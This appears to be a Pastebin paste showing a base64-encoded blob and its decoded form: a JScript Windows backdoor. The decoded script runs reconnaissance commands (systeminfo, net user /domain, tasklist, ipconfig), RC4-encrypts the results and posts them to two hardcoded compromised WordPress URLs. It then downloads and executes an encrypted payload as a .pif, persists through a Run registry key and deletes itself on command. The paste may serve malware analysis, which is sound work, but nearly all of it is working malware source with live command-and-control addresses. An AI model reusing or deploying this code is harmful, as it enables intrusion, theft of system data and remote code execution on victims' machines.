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";
  165.     return U5l2;
  166. }
  167.  
  168. ## which decodes to:
  169.  
  170. function S7EN(KL3M) {
  171.     var gfjd = WScript.CreateObject("ADODB.Stream")
  172.     gfjd.Type = 2;
  173.     gfjd.CharSet = '437';
  174.     gfjd.Open();
  175.     gfjd.LoadFromFile(KL3M);
  176.     var j3k6 = gfjd.ReadText;
  177.     gfjd.Close();
  178.     return l9BJ(j3k6);
  179. }
  180. var WQuh = new Array("http://soligro.com/wp-includes/pomo/db.php", "http://belcollegium.org/wp-admin/includes/class-wp-upload-plugins-list-table.php");
  181. var zIRF = "KRMLT0G3PHdYjnEm";
  182. var LwHA = new Array("systeminfo > ", "net view >> ", "net view /domain >> ", "tasklist /v >> ", "gpresult /z >> ", "netstat -nao >> ", "ipconfig /all >> ", "arp -a >> ", "net share >> ", "net use >> ", "net user >> ", "net user administrator >> ", "net user /domain >> ", "net user administrator /domain >> ", "set  >> ", "dir %systemdrive%\x5cUsers\x5c*.* >> ", "dir %userprofile%\x5cAppData\x5cRoaming\x5cMicrosoft\x5cWindows\x5cRecent\x5c*.* >> ", "dir %userprofile%\x5cDesktop\x5c*.* >> ", "tasklist /fi \x22modules eq wow64.dll\x22  >> ", "tasklist /fi \x22modules ne wow64.dll\x22 >> ", "dir \x22%programfiles(x86)%\x22 >> ", "dir \x22%programfiles%\x22 >> ", "dir %appdata% >>");
  183. var Z6HQ = new ActiveXObject("Scripting.FileSystemObject");
  184. var EBKd = WScript.ScriptName;
  185. var Vxiu = "";
  186. var lDd9 = a0rV();
  187.  
  188. function DGbq(xxNA, j5zO) {
  189.     char_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  190.     var bzwO = "";
  191.     var sW_c = "";
  192.     for (var i = 0; i < xxNA.length; ++i) {
  193.         var W0Ce = xxNA.charCodeAt(i);
  194.         var o_Nk = W0Ce.toString(2);
  195.         while (o_Nk.length < (j5zO ? 8 : 16))
  196.             o_Nk = "0" + o_Nk;
  197.         sW_c += o_Nk;
  198.         while (sW_c.length >= 6) {
  199.             var AaP0 = sW_c.slice(0, 6);
  200.             sW_c = sW_c.slice(6);
  201.             bzwO += this.char_set.charAt(parseInt(AaP0, 2));
  202.         }
  203.     }
  204.     if (sW_c) {
  205.         while (sW_c.length < 6) sW_c += "0";
  206.         bzwO += this.char_set.charAt(parseInt(sW_c, 2));
  207.     }
  208.     while (bzwO.length % (j5zO ? 4 : 8) != 0)
  209.         bzwO += "=";
  210.     return bzwO;
  211. }
  212. var lW6t = [];
  213. lW6t['C7'] = '80';
  214. lW6t['FC'] = '81';
  215. lW6t['E9'] = '82';
  216. lW6t['E2'] = '83';
  217. lW6t['E4'] = '84';
  218. lW6t['E0'] = '85';
  219. lW6t['E5'] = '86';
  220. lW6t['E7'] = '87';
  221. lW6t['EA'] = '88';
  222. lW6t['EB'] = '89';
  223. lW6t['E8'] = '8A';
  224. lW6t['EF'] = '8B';
  225. lW6t['EE'] = '8C';
  226. lW6t['EC'] = '8D';
  227. lW6t['C4'] = '8E';
  228. lW6t['C5'] = '8F';
  229. lW6t['C9'] = '90';
  230. lW6t['E6'] = '91';
  231. lW6t['C6'] = '92';
  232. lW6t['F4'] = '93';
  233. lW6t['F6'] = '94';
  234. lW6t['F2'] = '95';
  235. lW6t['FB'] = '96';
  236. lW6t['F9'] = '97';
  237. lW6t['FF'] = '98';
  238. lW6t['D6'] = '99';
  239. lW6t['DC'] = '9A';
  240. lW6t['A2'] = '9B';
  241. lW6t['A3'] = '9C';
  242. lW6t['A5'] = '9D';
  243. lW6t['20A7'] = '9E';
  244. lW6t['192'] = '9F';
  245. lW6t['E1'] = 'A0';
  246. lW6t['ED'] = 'A1';
  247. lW6t['F3'] = 'A2';
  248. lW6t['FA'] = 'A3';
  249. lW6t['F1'] = 'A4';
  250. lW6t['D1'] = 'A5';
  251. lW6t['AA'] = 'A6';
  252. lW6t['BA'] = 'A7';
  253. lW6t['BF'] = 'A8';
  254. lW6t['2310'] = 'A9';
  255. lW6t['AC'] = 'AA';
  256. lW6t['BD'] = 'AB';
  257. lW6t['BC'] = 'AC';
  258. lW6t['A1'] = 'AD';
  259. lW6t['AB'] = 'AE';
  260. lW6t['BB'] = 'AF';
  261. lW6t['2591'] = 'B0';
  262. lW6t['2592'] = 'B1';
  263. lW6t['2593'] = 'B2';
  264. lW6t['2502'] = 'B3';
  265. lW6t['2524'] = 'B4';
  266. lW6t['2561'] = 'B5';
  267. lW6t['2562'] = 'B6';
  268. lW6t['2556'] = 'B7';
  269. lW6t['2555'] = 'B8';
  270. lW6t['2563'] = 'B9';
  271. lW6t['2551'] = 'BA';
  272. lW6t['2557'] = 'BB';
  273. lW6t['255D'] = 'BC';
  274. lW6t['255C'] = 'BD';
  275. lW6t['255B'] = 'BE';
  276. lW6t['2510'] = 'BF';
  277. lW6t['2514'] = 'C0';
  278. lW6t['2534'] = 'C1';
  279. lW6t['252C'] = 'C2';
  280. lW6t['251C'] = 'C3';
  281. lW6t['2500'] = 'C4';
  282. lW6t['253C'] = 'C5';
  283. lW6t['255E'] = 'C6';
  284. lW6t['255F'] = 'C7';
  285. lW6t['255A'] = 'C8';
  286. lW6t['2554'] = 'C9';
  287. lW6t['2569'] = 'CA';
  288. lW6t['2566'] = 'CB';
  289. lW6t['2560'] = 'CC';
  290. lW6t['2550'] = 'CD';
  291. lW6t['256C'] = 'CE';
  292. lW6t['2567'] = 'CF';
  293. lW6t['2568'] = 'D0';
  294. lW6t['2564'] = 'D1';
  295. lW6t['2565'] = 'D2';
  296. lW6t['2559'] = 'D3';
  297. lW6t['2558'] = 'D4';
  298. lW6t['2552'] = 'D5';
  299. lW6t['2553'] = 'D6';
  300. lW6t['256B'] = 'D7';
  301. lW6t['256A'] = 'D8';
  302. lW6t['2518'] = 'D9';
  303. lW6t['250C'] = 'DA';
  304. lW6t['2588'] = 'DB';
  305. lW6t['2584'] = 'DC';
  306. lW6t['258C'] = 'DD';
  307. lW6t['2590'] = 'DE';
  308. lW6t['2580'] = 'DF';
  309. lW6t['3B1'] = 'E0';
  310. lW6t['DF'] = 'E1';
  311. lW6t['393'] = 'E2';
  312. lW6t['3C0'] = 'E3';
  313. lW6t['3A3'] = 'E4';
  314. lW6t['3C3'] = 'E5';
  315. lW6t['B5'] = 'E6';
  316. lW6t['3C4'] = 'E7';
  317. lW6t['3A6'] = 'E8';
  318. lW6t['398'] = 'E9';
  319. lW6t['3A9'] = 'EA';
  320. lW6t['3B4'] = 'EB';
  321. lW6t['221E'] = 'EC';
  322. lW6t['3C6'] = 'ED';
  323. lW6t['3B5'] = 'EE';
  324. lW6t['2229'] = 'EF';
  325. lW6t['2261'] = 'F0';
  326. lW6t['B1'] = 'F1';
  327. lW6t['2265'] = 'F2';
  328. lW6t['2264'] = 'F3';
  329. lW6t['2320'] = 'F4';
  330. lW6t['2321'] = 'F5';
  331. lW6t['F7'] = 'F6';
  332. lW6t['2248'] = 'F7';
  333. lW6t['B0'] = 'F8';
  334. lW6t['2219'] = 'F9';
  335. lW6t['B7'] = 'FA';
  336. lW6t['221A'] = 'FB';
  337. lW6t['207F'] = 'FC';
  338. lW6t['B2'] = 'FD';
  339. lW6t['25A0'] = 'FE';
  340. lW6t['A0'] = 'FF';
  341.  
  342. function a0rV() {
  343.     var YrUH = Math.ceil(Math.random() * 10 + 25);
  344.     var name = String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  345.     var JKfG = WScript.CreateObject("WScript.Network");
  346.     Vxiu = JKfG.UserName;
  347.     for (var count = 0; count < YrUH; count++) {
  348.         switch (Math.ceil(Math.random() * 3)) {
  349.             case 1:
  350.                 name = name + Math.ceil(Math.random() * 8);
  351.                 break;
  352.             case 2:
  353.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 97));
  354.                 break;
  355.             default:
  356.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  357.                 break;
  358.         }
  359.     }
  360.     return name;
  361. }
  362. var icVh = Jp6A(HAP5());
  363. try {
  364.     var CJPE = HAP5();
  365.     W6cM();
  366.     Syrl();
  367. } catch (e) {
  368.     WScript.Quit();
  369. }
  370.  
  371. function Syrl() {
  372.     var m2n0 = xhOC();
  373.     while (true) {
  374.         for (var i = 0; i < WQuh.length; i++) {
  375.             var bx_4 = WQuh[i];
  376.             var czlA = V9iU(bx_4, m2n0);
  377.             switch (czlA) {
  378.                 case "good":
  379.                     break;
  380.                 case "exit":
  381.                     WScript.Quit();
  382.                     break;
  383.                 case "work":
  384.                     eRNv(bx_4);
  385.                     break;
  386.                 case "fail":
  387.                     I7UO();
  388.                     break;
  389.                 default:
  390.                     break;
  391.             }
  392.             a0rV();
  393.         }
  394.         WScript.Sleep((Math.random() * 300 + 3600) * 1000);
  395.     }
  396. }
  397.  
  398. function HAP5() {
  399.     var zkDC = this['\u0041\u0063\u0074i\u0076eX\u004F\u0062j\u0065c\u0074'];
  400.     var jVNP = new zkDC('\u0057\u0053cr\u0069\u0070\u0074\u002E\u0053he\u006C\u006C');
  401.     return jVNP;
  402. }
  403.  
  404. function eRNv(caA2) {
  405.     var jpVh = icVh + EBKd.substring(0, EBKd.length - 2) + "pif";
  406.     var S47T = new ActiveXObject("MSXML2.XMLHTTP");
  407.     S47T.OPEN("post", caA2, false);
  408.     S47T.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + he50());
  409.     S47T.SETREQUESTHEADER("content-type:", "application/octet-stream");
  410.     S47T.SETREQUESTHEADER("content-length:", "4");
  411.     S47T.SEND("work");
  412.     if (Z6HQ.FILEEXISTS(jpVh)) {
  413.         Z6HQ.DELETEFILE(jpVh);
  414.     }
  415.     if (S47T.STATUS == 200) {
  416.         var gfjd = new ActiveXObject("ADODB.STREAM");
  417.         gfjd.TYPE = 1;
  418.         gfjd.OPEN();
  419.         gfjd.WRITE(S47T.responseBody);
  420.         gfjd.Position = 0;
  421.         gfjd.Type = 2;
  422.         gfjd.CharSet = "437";
  423.         var j3k6 = gfjd.ReadText(gfjd.Size);
  424.         var RAKT = t7Nl("2f532d6baec3d0ec7b1f98aed4774843", l9BJ(j3k6));
  425.         Trql(RAKT, jpVh);
  426.         gfjd.Close();
  427.     }
  428.     var lDd9 = a0rV();
  429.     nr3z(jpVh, caA2);
  430.     WScript.Sleep(30000);
  431.     Z6HQ.DELETEFILE(jpVh);
  432. }
  433.  
  434. function I7UO() {
  435.     Z6HQ.DELETEFILE(WScript.SCRIPTFULLNAME);
  436.     CJPE.REGDELETE("HKEY_CURRENT_USER\x5csoftware\x5cmicrosoft\x5cwindows\x5ccurrentversion\x5crun\x5c" + EBKd.substring(0, EBKd.length - 3));
  437.     WScript.Quit();
  438. }
  439.  
  440. function V9iU(pxug, tqDX) {
  441.     try {
  442.         var S47T = new ActiveXObject("MSXML2.XMLHTTP");
  443.         S47T.OPEN("post", pxug, false);
  444.         S47T.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + he50());
  445.         S47T.SETREQUESTHEADER("content-type:", "application/octet-stream");
  446.         var SoNI = DGbq(tqDX, true);
  447.         S47T.SETREQUESTHEADER("content-length:", SoNI.length);
  448.         S47T.SEND(SoNI);
  449.         return S47T.responseText;
  450.     } catch (e) {
  451.         return "";
  452.     }
  453. }
  454.  
  455. function he50() {
  456.     var wXgO = "";
  457.     var JKfG = WScript.CreateObject("WScript.Network");
  458.     var SoNI = zIRF + JKfG.ComputerName + Vxiu;
  459.     for (var i = 0; i < 16; i++) {
  460.         var DXHy = 0
  461.         for (var j = i; j < SoNI.length - 1; j++) {
  462.             DXHy = DXHy ^ SoNI.charCodeAt(j);
  463.         }
  464.         DXHy = (DXHy % 10);
  465.         wXgO = wXgO + DXHy.toString(10);
  466.     }
  467.     wXgO = wXgO + zIRF;
  468.     return wXgO;
  469. }
  470.  
  471. function W6cM() {
  472.     v_FileName = icVh + EBKd.substring(0, EBKd.length - 2) + "js";
  473.     Z6HQ.COPYFILE(WScript.ScriptFullName, icVh + EBKd);
  474.     var zIqu = (Math.random() * 150 + 350) * 1000;
  475.     WScript.Sleep(zIqu);
  476.     CJPE.REGWRITE("HKEY_CURRENT_USER\x5csoftware\x5cmicrosoft\x5cwindows\x5ccurrentversion\x5crun\x5c" + EBKd.substring(0, EBKd.length - 3), ("wscript.exe //B " + String.fromCharCode(34) + icVh + EBKd + String.fromCharCode(34) + " NPEfpRZ4aqnh1YuGwQd0"), "REG_SZ");
  477. }
  478.  
  479. function xhOC() {
  480.     var U5rJ = icVh + "~dat.tmp";
  481.     for (var i = 0; i < LwHA.length; i++) {
  482.         CJPE.Run("cmd.exe /c " + LwHA[i] + "\x22" + U5rJ + "", 0, true);
  483.     }
  484.     var jxHd = S7EN(U5rJ);
  485.     WScript.Sleep(1000);
  486.     Z6HQ.DELETEFILE(U5rJ);
  487.     return t7Nl("2f532d6baec3d0ec7b1f98aed4774843", jxHd);
  488. }
  489.  
  490. function nr3z(jpVh, caA2) {
  491.     try {
  492.         if (Z6HQ.FILEEXISTS(jpVh)) {
  493.             CJPE.Run("\x22" + jpVh + "\x22");
  494.         }
  495.     } catch (e) {
  496.         var S47T = new ActiveXObject("MSXML2.XMLHTTP");
  497.         S47T.OPEN("post", caA2, false);
  498.         var ND3M = "error";
  499.         S47T.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + he50());
  500.         S47T.SETREQUESTHEADER("content-type:", "application/octet-stream");
  501.         S47T.SETREQUESTHEADER("content-length:", ND3M.length);
  502.         S47T.SEND(ND3M);
  503.         return "";
  504.     }
  505. }
  506.  
  507. function poBP(QQDq) {
  508.     var HiEg = "0123456789ABCDEF";
  509.     var L9qj = HiEg.substr(QQDq & 15, 1);
  510.     while (QQDq > 15) {
  511.         QQDq >>>= 4;
  512.         L9qj = HiEg.substr(QQDq & 15, 1) + L9qj;
  513.     }
  514.     return L9qj;
  515. }
  516.  
  517. function JbVq(x4hL) {
  518.     return parseInt(x4hL, 16);
  519. }
  520.  
  521. function l9BJ(Wid9) {
  522.     var wXgO = [];
  523.     var pV8q = Wid9.length;
  524.     for (var i = 0; i < pV8q; i++) {
  525.         var yWql = Wid9.charCodeAt(i);
  526.         if (yWql >= 128) {
  527.             var h = lW6t['' + poBP(yWql)];
  528.             yWql = JbVq(h);
  529.         }
  530.         wXgO.push(yWql);
  531.     }
  532.     return wXgO;
  533. }
  534.  
  535. function Trql(EQ4R, K5X0) {
  536.     var gfjd = WScript.CreateObject("ADODB.Stream");
  537.     gfjd.type = 2;
  538.     gfjd.Charset = "iso-8859-1";
  539.     gfjd.Open();
  540.     gfjd.WriteText(EQ4R);
  541.     gfjd.Flush();
  542.     gfjd.Position = 0;
  543.     gfjd.SaveToFile(K5X0, 2);
  544.     gfjd.close();
  545. }
  546.  
  547. function Jp6A(KgOm) {
  548.     icVh = "c:\x5cUsers\x5c" + Vxiu + "\x5cAppData\x5cLocal\x5cMicrosoft\x5cWindows\x5c";
  549.     if (!Z6HQ.FOLDEREXISTS(icVh))
  550.         icVh = "c:\x5cUsers\x5c" + Vxiu + "\x5cAppData\x5cLocal\x5cTemp\x5c";
  551.     if (!Z6HQ.FOLDEREXISTS(icVh))
  552.         icVh = "c:\x5cDocuments and Settings\x5c" + Vxiu + "\x5cApplication Data\x5cMicrosoft\x5cWindows\x5c";
  553.     return icVh
  554. }
  555.  
  556. function t7Nl(npmb, AIsp) {
  557.     var M4tj = [];
  558.     var KRYr = 0;
  559.     var FPIW;
  560.     var wXgO = '';
  561.     for (var i = 0; i < 256; i++) {
  562.         M4tj[i] = i;
  563.     }
  564.     for (var i = 0; i < 256; i++) {
  565.         KRYr = (KRYr + M4tj[i] + npmb.charCodeAt(i % npmb.length)) % 256;
  566.         FPIW = M4tj[i];
  567.         M4tj[i] = M4tj[KRYr];
  568.         M4tj[KRYr] = FPIW;
  569.     }
  570.     var i = 0;
  571.     var KRYr = 0;
  572.     for (var y = 0; y < AIsp.length; y++) {
  573.         i = (i + 1) % 256;
  574.         KRYr = (KRYr + M4tj[i]) % 256;
  575.         FPIW = M4tj[i];
  576.         M4tj[i] = M4tj[KRYr];
  577.         M4tj[KRYr] = FPIW;
  578.         wXgO += String.fromCharCode(AIsp[y] ^ M4tj[(M4tj[i] + M4tj[KRYr]) % 256]);
  579.     }
  580.     return wXgO;
  581. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top